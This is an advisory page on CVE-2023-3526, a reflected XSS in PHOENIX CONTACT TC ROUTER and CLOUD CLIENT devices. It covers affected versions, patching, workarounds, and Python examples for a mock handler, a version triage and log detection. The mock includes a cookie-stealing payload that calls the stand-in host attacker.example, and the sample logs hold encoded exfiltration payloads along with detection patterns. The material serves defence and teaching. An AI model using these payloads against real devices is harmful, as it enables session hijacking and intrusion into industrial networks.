CVE-2023-3526

9.6 CRITICAL

📋 TL;DR

CVE-2023-3526 is a reflected cross-site scripting (XSS) vulnerability in the license viewer page of PHOENIX CONTACT TC ROUTER and TC CLOUD CLIENT devices. An unauthenticated remote attacker can craft a link to that page which, when opened by a user of the device's web interface (typically a logged-in administrator), executes attacker-controlled JavaScript in that user's browser in the device's origin. This affects organizations that use these industrial networking devices for remote access or cloud connectivity. The injected script can steal session cookies, redirect the user, or issue requests to the device management interface with the victim's privileges.

💻 Affected Systems

Products:
  • PHOENIX CONTACT TC ROUTER
  • PHOENIX CONTACT TC CLOUD CLIENT
  • PHOENIX CONTACT CLOUD CLIENT 1101T-TX/TX
Versions: TC ROUTER and TC CLOUD CLIENT versions prior to 2.07.2; CLOUD CLIENT 1101T-TX/TX versions prior to 2.06.10
Operating Systems: Embedded Linux-based firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Any device whose web management interface can be reached by a browser that an attacker can lure to a crafted link is exposed. The attacker needs no account on the device: the license viewer page reflects the payload to whoever requests it, and the script then runs in the browser of the person who followed the link, so the attacker ends up with that person's session and privileges rather than their own.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker who gets an administrator to open the crafted link can hijack that administrator's session with the device, reconfigure it (firewall, VPN and cloud-connectivity settings included), use the device as a foothold into the networks behind it, and disrupt the industrial operations that depend on it, with physical consequences in critical infrastructure environments.

🟠

Likely Case

Attackers would steal session cookies, or drive the victim's browser directly if the cookies are HttpOnly, to gain unauthorized access to the device management interface, potentially modifying configurations, disrupting network connectivity, or using the device as a foothold for further attacks.

🟢

If Mitigated

With proper network segmentation and access controls, impact would be limited to the specific device's management interface, preventing lateral movement to operational technology networks.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Proof-of-concept exploit code is publicly available. Exploitation requires minimal technical skill: the attacker places the payload in the query string of a URL to the license viewer page and gets a logged-in user to open it (a phishing mail, a link in a ticket, or a page the user visits). The attacker never authenticates to the device; the only interaction with the device is the victim's own browser requesting the page.
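A mock of the vulnerability class and its fix, added here as an example; it is not the device's firmware code, which is not public. The page path, the parameter name, the device address and the exfiltration host are assumptions, and the hardened handler shows the standard remediation for reflected XSS (output encoding in the HTML text context), not Phoenix Contact's actual patch. Running it prints the link an attacker would send, the vulnerable response that ships the payload back to the victim's browser intact, and the hardened response in which it is inert:

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed mock of a "license viewer" page. The real firmware's page path and
# parameter name are not public, so "/license" and "pkg" are assumptions.
LICENSE_PATH = "/license"


def render_vulnerable(query):
    """Reflects the untrusted 'pkg' parameter straight into the HTML (the bug class)."""
    pkg = query.get("pkg", [""])[0]
    return f"<html><body><h1>License viewer</h1><p>Package: {pkg}</p></body></html>"


def render_hardened(query):
    """Same page with output encoding. The vendor's actual fix is not published;
    this is the standard remediation for reflected XSS in an HTML text context."""
    pkg = html.escape(query.get("pkg", [""])[0], quote=True)
    return f"<html><body><h1>License viewer</h1><p>Package: {pkg}</p></body></html>"


# Payload an attacker would embed in the link; attacker.example is a placeholder host.
PAYLOAD = "<img src=x onerror=\"fetch('http://attacker.example/?c='+document.cookie)\">"


def attacker_link(device_base):
    """The unauthenticated attacker only builds a URL and gets an admin to open it."""
    return f"{device_base}{LICENSE_PATH}?{urlencode({'pkg': PAYLOAD})}"


def serve(url, handler):
    """Stand-in for the device parsing the request the victim's browser sends."""
    return handler(parse_qs(urlparse(url).query))


def demo(device_base="https://192.0.2.10"):
    """Run the same crafted link through the vulnerable and the hardened handler."""
    url = attacker_link(device_base)
    return {
        "url": url,
        "vulnerable": serve(url, render_vulnerable),
        "hardened": serve(url, render_hardened),
    }


if __name__ == "__main__":
    out = demo()
    print(out["url"])
    print(out["vulnerable"])
    print(out["hardened"])
```

In the vulnerable response the browser executes the payload in the device's origin, which is why the advisory rates the issue critical (scope changed) although the attacker never authenticates. Output encoding is the fix; a Content-Security-Policy without unsafe-inline would be a second layer, but it does not replace encoding.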

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: TC ROUTER and TC CLOUD CLIENT: 2.07.2; CLOUD CLIENT 1101T-TX/TX: 2.06.10

Vendor Advisory: https://cert.vde.com/en/advisories/VDE-2023-017

Restart Required: Yes

Instructions:

1. Back up the device configuration.
2. Download the firmware update for your model from the PHOENIX CONTACT support portal.
3. Upload the firmware via the web interface or CLI.
4. Apply the update and restart the device.
5. After the reboot, confirm that the running version is 2.07.2 (TC ROUTER, TC CLOUD CLIENT) or 2.06.10 (CLOUD CLIENT 1101T-TX/TX) or later.

🔧 Temporary Workarounds

Network Access Restriction

Applies to: all affected versions

Restrict access to the device's management interface (HTTP/HTTPS) with firewall rules so that only trusted administrative networks can reach it. Caveat: this is a reflected XSS, so the malicious request is made by the victim's own browser from inside the trusted network; the restriction limits who can be targeted and what the injected script can reach afterwards, it does not stop the injection itself. Blocking outbound connections from administrative workstations to untrusted hosts additionally hampers cookie exfiltration.

Web Application Firewall

Applies to: all affected versions

Place a WAF (or a reverse proxy with XSS rules) in front of the device's web interface to drop requests carrying script fragments before they reach the vulnerable page. Signature-based XSS filtering is routinely bypassed with alternative encodings and tag/handler combinations, so treat it as a stopgap until the firmware is updated, and only deploy it if all management traffic can be forced through the proxy.

🧯 If You Can't Patch

  • Isolate affected devices in separate network segments with strict firewall rules preventing external access
  • Disable remote management interfaces if not required and use local console access only
  • Because exploitation needs an administrator to open a crafted link while logged in, manage the devices from a dedicated browser profile or jump host, do not follow links to the device's web UI from e-mail or tickets, and log out when finished

🔍 How to Verify

Check if Vulnerable:

A device is vulnerable if it runs TC ROUTER or TC CLOUD CLIENT firmware earlier than 2.07.2, or CLOUD CLIENT 1101T-TX/TX firmware earlier than 2.06.10. Read the firmware version via the web interface (System > Information) or the CLI command 'show version' and compare it against these ranges.

Check Version:

Via web interface: Navigate to System > Information (menu labels vary between models). Via CLI: Use 'show version' or 'system info'.

Verify Fix Applied:

After patching, verify that the firmware version shows 2.07.2 or higher for TC ROUTER/TC CLOUD CLIENT, or 2.06.10 or higher for CLOUD CLIENT 1101T-TX/TX. Compare versions numerically, not as strings: 2.07.2 and 2.7.2 are the same release.
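An inventory check of the kind a triage script would run against the version boundaries above, added here as an example and not part of the vendor advisory. The sample inventory is constructed, and the script assumes the firmware version string starts with three dot-separated numbers as shown on this page (2.07.2, 2.06.10); the comparison is numeric so that leading zeros and two-digit components are handled:

```python
import re

# Fixed versions from the vendor advisory (VDE-2023-017); anything below is affected.
FIXED_VERSIONS = {
    "TC ROUTER": (2, 7, 2),
    "TC CLOUD CLIENT": (2, 7, 2),
    "CLOUD CLIENT 1101T-TX/TX": (2, 6, 10),
}

VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Turn '2.07.2' into (2, 7, 2). Compare as integers, never as strings:
    '2.07.2' and '2.7.2' are the same release and '2.9.0' sorts before '2.10.0'."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return tuple(int(part) for part in m.groups())


def fixed_version_for(product):
    """Prefix match on the reported product name, longest key first so the most
    specific entry wins. Returns None for products outside this advisory."""
    name = product.upper()
    for key in sorted(FIXED_VERSIONS, key=len, reverse=True):
        if name.startswith(key):
            return FIXED_VERSIONS[key]
    return None


def is_vulnerable(product, version):
    """True/False for affected product families, None if the product is out of scope."""
    fixed = fixed_version_for(product)
    if fixed is None:
        return None
    return parse_version(version) < fixed


# Constructed inventory export: (product name as reported by the device, firmware version).
SAMPLE_INVENTORY = [
    ("TC ROUTER 3002T-4G", "2.06.5"),
    ("TC ROUTER 3002T-4G", "2.07.2"),
    ("TC CLOUD CLIENT 1002-4G", "2.7.2"),
    ("CLOUD CLIENT 1101T-TX/TX", "2.06.9"),
    ("CLOUD CLIENT 1101T-TX/TX", "2.06.10"),
    ("UNRELATED PRODUCT", "1.0.0"),
]


def triage(inventory=SAMPLE_INVENTORY):
    """List the devices that still need the update."""
    return [(product, version) for product, version in inventory
            if is_vulnerable(product, version)]


if __name__ == "__main__":
    for product, version in triage():
        print(f"UPDATE NEEDED: {product} running {version}")
```

Devices already on the fixed version are reported as not vulnerable because the advisory wording is "prior to" the fixed release; products that are not in the advisory return None rather than False so they are not silently marked safe.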

📡 Detection & Monitoring

Log Indicators:

  • Requests to the license viewer page from source addresses that never log in or that sit outside the administrative network
  • Multiple failed authentication attempts followed by license page access
  • Request lines whose query parameters contain script tags, inline event handlers (onerror=, onload=) or javascript: URIs, usually percent-encoded and sometimes double-encoded

Network Indicators:

  • HTTP requests with percent-encoded JavaScript (for example %3Cscript, %3Cimg, onerror%3D) in query strings targeting /license or similar endpoints
  • Traffic from unexpected sources to device management ports (typically 80/443), and outbound connections from administrative workstations to unknown hosts shortly after a license page request (cookie exfiltration)

SIEM Query:

source="device_logs" AND (url="*license*" AND (param="*script*" OR param="*javascript*" OR param="*onload*" OR param="*onerror*"))

Match against the URL-decoded request, or add the percent-encoded forms (such as "*%3Cscript*" and "*onerror%3D*") to the query: web-server logs usually record the raw, encoded request line, and the plain patterns above will not match it.
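The detection logic from the indicators above, run over constructed access-log lines, as an added example (the device's real log format is not documented on this page). The license page path "/license", the Common Log Format layout and the trusted administrative range are assumptions. The point it demonstrates is the decoding step: query values are URL-decoded until stable before matching, so single- and double-encoded payloads are both caught, and each hit is flagged if its source is outside the administrative range:

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Common Log Format). The device's real log format
# and the real path of the license viewer page are not public; "/license" is assumed.
SAMPLE_LOG = """\
192.0.2.44 - - [12/Jul/2023:10:01:02 +0000] "GET /license?name=foo HTTP/1.1" 200 512
203.0.113.7 - - [12/Jul/2023:10:02:17 +0000] "GET /license?name=%3Cscript%3Efetch(%27http://203.0.113.7/%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 640
203.0.113.7 - - [12/Jul/2023:10:02:40 +0000] "GET /license?name=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 640
192.0.2.44 - - [12/Jul/2023:10:05:00 +0000] "GET /status HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Script tags, javascript: URIs, inline event handlers, and common carrier tags.
XSS_RE = re.compile(r"<\s*script|javascript\s*:|\bon[a-z]+\s*=|<\s*(img|svg|iframe|body)\b", re.IGNORECASE)
TRUSTED_ADMIN_NETS = ("192.0.2.",)  # assumption: where legitimate administrators sit


def fully_decode(value, rounds=3):
    """parse_qsl already decoded once; keep decoding until stable to catch
    double-encoded payloads (%253C -> %3C -> <) without looping forever."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Split one CLF line into source, timestamp, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = {k: fully_decode(v) for k, v in parse_qsl(parts.query, keep_blank_values=True)}
    return rec


def find_xss_attempts(log_text, license_path="/license"):
    """One record per request to the license page whose decoded query carries a
    script payload, flagged when the source lies outside the admin range."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != license_path:
            continue
        for param, value in rec["params"].items():
            if XSS_RE.search(value):
                hits.append({
                    "src": rec["src"],
                    "ts": rec["ts"],
                    "param": param,
                    "payload": value,
                    "untrusted_source": not rec["src"].startswith(TRUSTED_ADMIN_NETS),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(hit)
```

Without the decoding step the second and third sample lines would not match: the raw request line contains %3Cscript%3E and %253Cimg, never the literal text. The handler pattern can fire on harmless values such as a parameter literally set to "on=1", so treat a hit as a trigger for review rather than an automatic block.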
